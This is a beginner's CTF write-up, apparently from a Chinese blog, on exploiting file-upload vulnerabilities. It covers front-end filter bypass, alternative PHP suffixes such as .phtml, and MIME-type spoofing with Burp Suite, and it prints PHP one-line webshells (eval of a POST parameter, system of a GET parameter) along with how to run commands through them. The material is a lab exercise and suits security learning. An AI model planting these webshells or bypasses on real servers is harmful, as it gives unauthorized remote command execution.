记一次简单的文件上传漏洞题目

已于 2022-08-31 20:47:33 修改
阅读量398 收藏 7
点赞数 4
分类专栏: CTF实战 文章标签: php
于 2022-08-28 21:53:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/126567228
版权

目录

前端过滤

php特殊后缀

mime类型

另外的一种一句话木马

前端过滤

1.打开题目进入

2.试着上传一份php文件

<?php @eval($_POST['root']); ?>

 php文件里面写了一句话木马,可以使用蚁剑进行连接,连接密码是root

 

3.发现上传不了

结论:可能是过滤了文件后缀名

4.使用burpsuit 抓取 php文件上传的数据包

5.发现抓取不到数据包 

6.修改php文件的后缀为jpg,再尝试上传

7.发现可以上传 

 

8.使用抓包工具抓包,可以抓到数据包

结论:是简单的前端过滤

9.修改文件后缀名,改回php后缀

10.再点击 forward 按钮进行发送 

11.返回网页,发现文件已经上传成功

12.寻找php文件路径

        >> 在url的路径上加上 ./upload/shell.php ,再回车

         >> 显示是一片空白,说明路径正确,复制粘贴路径

13.打开蚁剑,使用蚁剑进行连接

 12.连接成功后点开链接,在里面就可以发现flag

php特殊后缀

1.进入题目,同上一题一模一样的操作,在使用burpsuit抓包的时候可以抓到包

        >> 修改文件的后缀名后 点击发送

  

 2.提示php文件上传失败

    结论:无法使用php后缀名,可以尝试使用php的特殊后缀

 3.特殊后缀

特殊后缀: .php3  .php5  .php7  .phtml  等

多重后缀:1.jpg.php 等

4.使用burpsuit抓包,修改不同的后缀名进行尝试 

5.最后使用 .phtml 的后缀名上传成功

 6.找到文件路径(同上),使用蚁剑进行连接

7.找到falg

8.也可以使用多重后缀绕过php过滤

9.发现依然可以上传成功

10.同样使用蚁剑连接,可以得到flag 

mime类型

1.同样无法上传php文件,只能上传图片

2.使用burpsuit 抓取 php文件上传的数据包

3 .发现可以抓到 

4.修改文件 mime 类型,将php文件的mime类型修改为图片的mime类型

文件的MIME类型:

Content-Type:text-plain  文本文件的MIME类型

Content-Type:image/jpeg  图片的MIME类型

Content-Type:application/octet-strem  PHP文件的MIME类型

 5.点击 forward ,发现上传成功

6.接下来使用蚁剑进行连接 php 文件的路径

 7.成功找到flag 

其他做法

1.修改php文件后缀名为jpg,再次进行抓包

2.成功抓到数据包

 3.在burpsuit里面修改回文件后缀名php

4.点击发送,发现没有上传成功

 5.尝试使用特殊后缀,发现php9 可以上传成功,但是在使用蚁剑连接时无法连接 -->不知道为什么

6.再次尝试使用 .phtml  后缀可以上传成功,也可以使用蚁剑连接

7.蚁剑连接后,找到flag

8.同样使用多重后缀也可以找到flag 

 另外的一种一句话木马

1.上述题目都是使用到蚁剑,还有一种一句话木马不需要使用到蚁剑进行连接

 <?PHP @system($_GET['cmd']);?>

2.以第一题  前端过滤  为例

 >> 通过相同的操作得到 php文件的路径

>>在这个路径后面输入 ?cmd=ls

>>回车

>>就可以找到flag

 3.如果将代码里面的  cmd 改成 yue

 <?PHP @system($_GET['yue']);?>

>>那么在url 路径后面应该输入 ?yue=ls

>>同样能够得到flag 

本人新手小白一枚,不喜勿喷,有错望大佬指正ヾ(≧▽≦*)o

月亮今天也很亮
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
3.18号日报,ctfhub中web,文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhub中web,文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
文件上传之upload-labs(一)
01-08
在【标题】提到的“upload-labs”是一个专门用于学习和实践文件上传漏洞的靶场环境,可以通过多种方式搭建,如使用XAMPP、phpstudy或Docker。其中,XAMPP和phpstudy是本地Web服务器开发环境,而Docker则提供了一个...
文件上传漏洞
ivan0609的专栏
03-22 2403
在上网的过程中,我们经常会将一些如图片、压缩包之类的文件上传到远端服务器进行保存。文件上传攻击指的是恶意攻击者利用一些站点没有对文件的类型做很好的校验,上传了可执行的文件或者脚本,并且通过脚本获得服务器上相应的权利,或者通过诱导外部用户访问、下载上传的病毒或木马文件,达到攻击的目的。 为了防范用户上传恶意的可执行的文件和脚本,以及将文件上传服务器当作免费的文件存储服务器使用,我们需要对上传文件类
文件上传漏洞练习
qq_61109509的博客
02-11 4104
目录 Pass-01 Pass-02 Pass-03 Pass-04 Pass-05 Pass-06 Pass-07 Pass-08 Pass-09 Pass-10 大佬文章总结的很好 靶场: upload-labs Pass-01 先试着上传一个php文件 将php后缀改成jpg。不成功,看提示 本pass在客户端使用js对不合法图片进行检查! 上传一句话木马,将后缀名改成jpg,然后抓包拦截,重新改为php,实现绕过js验证 Pas...
常见的 MIME 文件类型
最新发布
weixin_50339217的博客
05-11 965
常见 MIME 类型列表 官网链接: https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Common_types 1. MIME 文件类型 API 类型 描述 文件/档类 — text/plain 纯文本文档 (不含二进制数据, 能有效避免XSS漏洞) text/html html 文档 text/css css 文件 text/javascript js 文件 te
文件上传漏洞做题(upload_labs)
weixin_55773382的博客
01-09 2185
Pass-01 查看页面源码,果然在前端进行了限制。 前端代码 把准备好的php文件后缀改为.jpg,这样就能绕过前端的检测。 修改后的文件 然后上传的时候使用burp suite拦截,并把文件后缀改回.php,成功上传php文件。 成功上传 pass-02 根据题目上传的要求是图片,猜测一下服务器校验content-typ在这里插入图片描述 pass 3 1,根据提示:这是黑名单绕过 2,前提是apachae的conf中有以下配置 AddType application/x-httpd-php
时隔四天,终于把这道文件上传漏洞题做出来了。
qz362228的博客
04-27 1944
先看题: 说明了文件保存路径./upload。点击展示发现有.htaccess文件,还有一个flag.php文件 在文本框中输入.htaccess,点击预览,出现下面这句话。但输入flag.php ,会弹框说不能直接操作flag文件。看下面这句话我们可以知道:在./upload目录下,文件名为098f6bcd4621d373cade4e832627b4f6.gif的文件可以php代码解析出来。所以可以想到要上传一个图片马,而且文件名为098f6bcd4621d373cade4e832627b4f6.gi
文件上传漏洞练习 upload-labs(11~15)【双写绕过,get%00截断绕过,post 00截断绕过,图片马上传及绕过】
bin789456的博客
08-24 905
写在前面 下面几道题目php源码有关,如果你对php并不是很熟悉,或者看起来较为吃力,可以点击下方 源码分析链接 会有基础知识准备,同时在pass-03中有源码分析和对各个函数的讲解。 Pass-11 这里点开源码都不一样了,不再是之前的去点,转小写,去特殊字符等等函数。 来看看吧: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $den
文件上传漏洞练习靶场upload-labs
07-05
文件上传漏洞是网络安全领域中的一个重要话题,它涉及到服务器安全、应用程序安全以及用户数据保护等多个方面。Upload-Labs是一个专门用于学习和实践文件上传漏洞的靶场,它包含了各种类型的文件上传漏洞实例,可以...
php 上传文件类型判断函数(避免上传漏洞 )
10-29
#### 一、背景与目的 在Web开发中,文件上传功能是非常常见的需求之一。然而,如果文件上传功能没有得到妥善的安全控制,很...通过上述方法,可以在很大程度上提高文件上传的安全性,减少因文件上传漏洞带来的风险。
28.文件上传漏洞和Caidao入门及防御原理(一)1
08-04
2. 环境搭建:为了研究和测试文件上传漏洞,通常需要搭建一个本地环境,例如使用XAMPP、WAMP等集成开发环境,创建一个支持文件上传简单Web应用,然后模拟攻击者的行为进行测试。 【二.木马原理及Caidao】 1. 一...
文件上传漏洞原理与实践练习题
weixin_54217081的博客
12-13 1276
一.单选 1.IIS默认的Web目录是( C ) A.C:\phpStudy\PHPTutorial\WWW B.C:\xampp\htdocs C.C:\Inetpub\wwwroot D./var/www/html
文件上传漏洞解析与upload题库讲解
zl52111的博客
04-13 610
一:前端检测 1.在前端文件上传时直接进行检测 例如直接检测后缀名 解决方法: 可以直接在页面中删除上传时所触发的事件 可以使用but进行抓包处理 修改文件后缀名 2.服务器端防御 (content-type类型)(例如14题) MIME类型(描述消息类型的因特网标准) 常见的MIME举例 当需要读取图片大小时 (这时后缀名和类型都没用) 可以使用图片方法
WebShell文件上传漏洞分析溯源(第2题)
jeehoon的博客
11-13 210
这道题在我打开burpsuite忘关的时候,我上传了一个.txt文件,发现它还是警告我不能上传,说明这道题目在前端就做了限制,那么我们只需要用burpsuite绕过前端,改包就可以上传一句话木马,先上传一个符合格式的文件 此处改成php文件 成功返回地址uploads/test.php,然后打开菜刀连接,找到key ...
WebShell文件上传漏洞练习
weixin_47493074的博客
09-20 273
WebShell文件上传漏洞练习
文件上传漏洞知识总结
二狗的博客
03-08 420
国光有一台 XPS15 里面运行着 macOS 和 Ubuntu 双系统,其中 XPS 主要系统就是 Ubuntu,国光在 Ubuntu里面搭建了一个离线的 CTFd 里面还运行着 Docker、宝塔。基本上很多服务都可以在我的 XPS 上运行起来了,出去讲课的时候会带着我的 XPS 和MBP 一起,离线靶场一开美滋滋,更关键的是往自己的靶场里面填充题目有一种养成游戏的感觉,很有成就感。
文件类漏洞试题
m0_61990875的博客
11-08 483
文件类面试题
上传文件漏洞练习技巧总结
Weaglew的博客
07-09 170
本文来源均在https://zhaijiahui.github.io/2019/01/28/upload-labs/ 练习源码在上文连接中已提到,感恩前辈。
文件上传及相关例题
2401_82388450的博客
04-13 1017
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
ctfshow文件上传
09-02
常见的文件上传漏洞包括但不限于以下几种: 1. 后缀绕过:目标服务器对上传文件的后缀进行了限制,但未对文件内容进行验证。您可以尝试修改文件后缀名,或者在上传时使用一些特殊的字符来绕过后缀检测。 2. MIME...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值